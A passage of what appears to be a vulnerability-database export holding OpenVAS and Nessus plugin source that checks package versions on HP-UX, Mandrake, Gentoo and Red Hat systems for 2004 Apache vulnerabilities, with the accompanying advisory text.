value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"HPSBUX\", value: \"01064\");\n script_cve_id(\"CVE-2004-0493\", \"CVE-2004-0488\", \"CVE-2004-0594\", \"CVE-2004-0595\");\n script_name( \"HP-UX Update for Apache HPSBUX01064\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of Apache\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.00\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"A.2.0.50.00\", rls:\"HPUX11.00\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"A.2.0.50.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"B.2.0.50.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"B.2.0.50.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:56:40", "references": ["http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c00915716-1", "01064"], "pluginID": "835148", "description": "Check for the Version of Apache", "edition": 2, "reporter": "Copyright (C) 2009 Greenbone Networks GmbH", "published": "2009-05-05T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "HP-UX Update for Apache HPSBUX01064", "type": "openvas", "naslFamily": "HP-UX Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0493", "CVE-2004-0595", "CVE-2004-0488", "CVE-2004-0594"], "modified": "2017-07-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=835148", "id": "OPENVAS:835148", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for Apache HPSBUX01064\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote execution of arbitrary code\n Denial of Service (DoS)\";\ntag_affected = \"Apache on\n HP-UX B.11.00, B.11.11, B.11.22, and B.11.23 running the hpuxwsAPACHE HP-UX \n Apache-based Web Server.\";\ntag_insight = \"A potential security vulnerability has been identified with HP-UX running \n Apache. The vulnerability could be exploited remotely to allow execution of \n arbitrary code or to create a Denial of Service (DoS).\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c00915716-1\");\n script_id(835148);\n script_version(\"$Revision: 6584 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 16:13:23 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"HPSBUX\", value: \"01064\");\n script_cve_id(\"CVE-2004-0493\", \"CVE-2004-0488\", \"CVE-2004-0594\", \"CVE-2004-0595\");\n script_name( \"HP-UX Update for Apache HPSBUX01064\");\n\n script_summary(\"Check for the Version of Apache\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.00\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"A.2.0.50.00\", rls:\"HPUX11.00\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"A.2.0.50.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"B.2.0.50.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"B.2.0.50.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2018-08-02T08:17:10", "references": ["http://www.guninski.com/httpd1.html"], "pluginID": "14163", "description": "A Denial of Service (Dos) condition was discovered in Apache 2.x by George Guninski. Exploiting this can lead to httpd consuming an arbitrary amount of memory. On 64bit systems with more than 4GB of virtual memory, this may also lead to a heap-based overflow.\n\nThe updated packages contain a patch from the ASF to correct the problem.\n\nIt is recommended that you stop Apache prior to updating and then restart it again once the update is complete ('service httpd stop' and 'service httpd start' respectively).", "edition": 3, "reporter": "Tenable", "published": "2004-07-31T00:00:00", "title": "Mandrake Linux Security Advisory : apache2 (MDKSA-2004:064)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Mandriva Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0493"], "modified": "2018-07-19T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:apache2-mod_dav", "p-cpe:/a:mandriva:linux:apache2-mod_ssl", "p-cpe:/a:mandriva:linux:apache2-mod_ldap", "p-cpe:/a:mandriva:linux:apache2", "p-cpe:/a:mandriva:linux:lib64apr0", "cpe:/o:mandrakesoft:mandrake_linux:9.1", "cpe:/o:mandrakesoft:mandrake_linux:10.0", "p-cpe:/a:mandriva:linux:apache2-mod_disk_cache", "p-cpe:/a:mandriva:linux:apache2-common", "p-cpe:/a:mandriva:linux:apache2-devel", "p-cpe:/a:mandriva:linux:apache2-modules", "cpe:/o:mandrakesoft:mandrake_linux:9.2", "p-cpe:/a:mandriva:linux:apache2-mod_mem_cache", "p-cpe:/a:mandriva:linux:apache2-manual", "p-cpe:/a:mandriva:linux:apache2-mod_file_cache", "p-cpe:/a:mandriva:linux:apache2-mod_proxy", "p-cpe:/a:mandriva:linux:apache2-mod_cache", "p-cpe:/a:mandriva:linux:libapr0", "p-cpe:/a:mandriva:linux:apache2-mod_deflate", "p-cpe:/a:mandriva:linux:apache2-source"], "id": "MANDRAKE_MDKSA-2004-064.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=14163", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2004:064. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(14163);\n script_version (\"1.17\");\n script_cvs_date(\"Date: 2018/07/19 20:59:13\");\n\n script_cve_id(\"CVE-2004-0493\");\n script_xref(name:\"MDKSA\", value:\"2004:064\");\n\n script_name(english:\"Mandrake Linux Security Advisory : apache2 (MDKSA-2004:064)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A Denial of Service (Dos) condition was discovered in Apache 2.x by\nGeorge Guninski. Exploiting this can lead to httpd consuming an\narbitrary amount of memory. On 64bit systems with more than 4GB of\nvirtual memory, this may also lead to a heap-based overflow.\n\nThe updated packages contain a patch from the ASF to correct the\nproblem.\n\nIt is recommended that you stop Apache prior to updating and then\nrestart it again once the update is complete ('service httpd stop' and\n'service httpd start' respectively).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.guninski.com/httpd1.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-mod_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-mod_dav\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-mod_deflate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-mod_disk_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-mod_file_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-mod_mem_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-mod_proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64apr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libapr0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/06/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-2.0.48-6.3.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-common-2.0.48-6.3.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-devel-2.0.48-6.3.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-manual-2.0.48-6.3.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-mod_cache-2.0.48-6.3.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-mod_dav-2.0.48-6.3.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-mod_deflate-2.0.48-6.3.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-mod_disk_cache-2.0.48-6.3.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-mod_file_cache-2.0.48-6.3.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-mod_ldap-2.0.48-6.3.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-mod_mem_cache-2.0.48-6.3.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-mod_proxy-2.0.48-6.3.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-mod_ssl-2.0.48-6.3.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-modules-2.0.48-6.3.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-source-2.0.48-6.3.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", cpu:\"amd64\", reference:\"lib64apr0-2.0.48-6.3.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", cpu:\"i386\", reference:\"libapr0-2.0.48-6.3.100mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"apache2-2.0.47-1.9.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"apache2-common-2.0.47-1.9.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"apache2-devel-2.0.47-1.9.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"apache2-manual-2.0.47-1.9.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"apache2-mod_dav-2.0.47-1.9.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"apache2-mod_ldap-2.0.47-1.9.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"apache2-mod_ssl-2.0.47-1.9.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"apache2-modules-2.0.47-1.9.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"apache2-source-2.0.47-1.9.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"libapr0-2.0.47-1.9.91mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-2.0.47-6.6.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-common-2.0.47-6.6.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-devel-2.0.47-6.6.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-manual-2.0.47-6.6.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-mod_cache-2.0.47-6.6.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-mod_dav-2.0.47-6.6.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-mod_deflate-2.0.47-6.6.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-mod_disk_cache-2.0.47-6.6.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-mod_file_cache-2.0.47-6.6.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-mod_ldap-2.0.47-6.6.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-mod_mem_cache-2.0.47-6.6.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-mod_proxy-2.0.47-6.6.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-mod_ssl-2.0.47-6.6.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-modules-2.0.47-6.6.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-source-2.0.47-6.6.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"amd64\", reference:\"lib64apr0-2.0.47-6.6.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"i386\", reference:\"libapr0-2.0.47-6.6.92mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-11T09:03:11", "references": ["http://www.guninski.com/httpd1.html", "https://security.gentoo.org/glsa/200407-03"], "pluginID": "14536", "description": "The remote host is affected by the vulnerability described in GLSA-200407-03 (Apache 2: Remote denial of service attack)\n\n A bug in the protocol.c file handling header lines will cause Apache to allocate memory for header lines starting with TAB or SPACE.\n Impact :\n\n An attacker can exploit this vulnerability to perform a Denial of Service attack by causing Apache to exhaust all memory. On 64 bit systems with more than 4GB of virtual memory a possible integer signedness error could lead to a buffer based overflow causing Apache to crash and under some circumstances execute arbitrary code as the user running Apache, usually 'apache'.\n Workaround :\n\n There is no known workaround at this time. All users are encouraged to upgrade to the latest available version:", "edition": 3, "reporter": "Tenable", "published": "2004-08-30T00:00:00", "title": "GLSA-200407-03 : Apache 2: Remote denial of service attack", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Gentoo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0493"], "modified": "2018-08-10T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:apache"], "id": "GENTOO_GLSA-200407-03.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=14536", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200407-03.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(14536);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/08/10 18:07:05\");\n\n script_cve_id(\"CVE-2004-0493\");\n script_xref(name:\"GLSA\", value:\"200407-03\");\n\n script_name(english:\"GLSA-200407-03 : Apache 2: Remote denial of service attack\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200407-03\n(Apache 2: Remote denial of service attack)\n\n A bug in the protocol.c file handling header lines will cause Apache to\n allocate memory for header lines starting with TAB or SPACE.\n \nImpact :\n\n An attacker can exploit this vulnerability to perform a Denial of Service\n attack by causing Apache to exhaust all memory. On 64 bit systems with more\n than 4GB of virtual memory a possible integer signedness error could lead\n to a buffer based overflow causing Apache to crash and under some\n circumstances execute arbitrary code as the user running Apache, usually\n 'apache'.\n \nWorkaround :\n\n There is no known workaround at this time. All users are encouraged to\n upgrade to the latest available version:\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.guninski.com/httpd1.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200407-03\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Apache 2 users should upgrade to the latest version of Apache:\n # emerge sync\n # emerge -pv '>=www-servers/apache-2.0.49-r4'\n # emerge '>=www-servers/apache-2.0.49-r4'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/07/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/08/30\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/06/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-servers/apache\", unaffected:make_list(\"ge 2.0.49-r4\", \"lt 2\"), vulnerable:make_list(\"le 2.0.49-r3\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Apache 2\");\n}\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-15T15:11:41", "references": ["https://www.redhat.com/security/data/cve/CVE-2004-0493.html", "http://www.apacheweek.com/features/security-20", "https://www.redhat.com/security/data/cve/CVE-2004-0488.html", "http://rhn.redhat.com/errata/RHSA-2004-342.html"], "pluginID": "12636", "description": "Updated httpd packages that fix a buffer overflow in mod_ssl and a remotely triggerable memory leak are now available.\n\nThe Apache HTTP server is a powerful, full-featured, efficient, and freely-available Web server.\n\nA stack-based buffer overflow was discovered in mod_ssl that could be triggered if using the FakeBasicAuth option. If mod_ssl was sent a client certificate with a subject DN field longer than 6000 characters, a stack overflow occured if FakeBasicAuth had been enabled. In order to exploit this issue the carefully crafted malicious certificate would have had to be signed by a Certificate Authority which mod_ssl is configured to trust. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2004-0488 to this issue.\n\nA remotely triggered memory leak in the Apache HTTP Server earlier than version 2.0.50 was also discovered. This allowed a remote attacker to perform a denial of service attack against the server by forcing it to consume large amounts of memory. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2004-0493 to this issue.\n\nUsers of the Apache HTTP server should upgrade to these updated packages, which contain backported patches that address these issues.", "edition": 4, "reporter": "Tenable", "published": "2004-07-06T00:00:00", "title": "RHEL 3 : httpd (RHSA-2004:342)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0493", "CVE-2004-0488"], "modified": "2018-08-13T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:3", "p-cpe:/a:redhat:enterprise_linux:mod_ssl", "p-cpe:/a:redhat:enterprise_linux:httpd", "p-cpe:/a:redhat:enterprise_linux:httpd-devel"], "id": "REDHAT-RHSA-2004-342.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=12636", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2004:342. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(12636);\n script_version (\"1.25\");\n script_cvs_date(\"Date: 2018/08/13 14:32:37\");\n\n script_cve_id(\"CVE-2004-0488\", \"CVE-2004-0493\");\n script_xref(name:\"RHSA\", value:\"2004:342\");\n\n script_name(english:\"RHEL 3 : httpd (RHSA-2004:342)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated httpd packages that fix a buffer overflow in mod_ssl and a\nremotely triggerable memory leak are now available.\n\nThe Apache HTTP server is a powerful, full-featured, efficient, and\nfreely-available Web server.\n\nA stack-based buffer overflow was discovered in mod_ssl that could be\ntriggered if using the FakeBasicAuth option. If mod_ssl was sent a\nclient certificate with a subject DN field longer than 6000\ncharacters, a stack overflow occured if FakeBasicAuth had been\nenabled. In order to exploit this issue the carefully crafted\nmalicious certificate would have had to be signed by a Certificate\nAuthority which mod_ssl is configured to trust. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the\nname CVE-2004-0488 to this issue.\n\nA remotely triggered memory leak in the Apache HTTP Server earlier\nthan version 2.0.50 was also discovered. This allowed a remote\nattacker to perform a denial of service attack against the server by\nforcing it to consume large 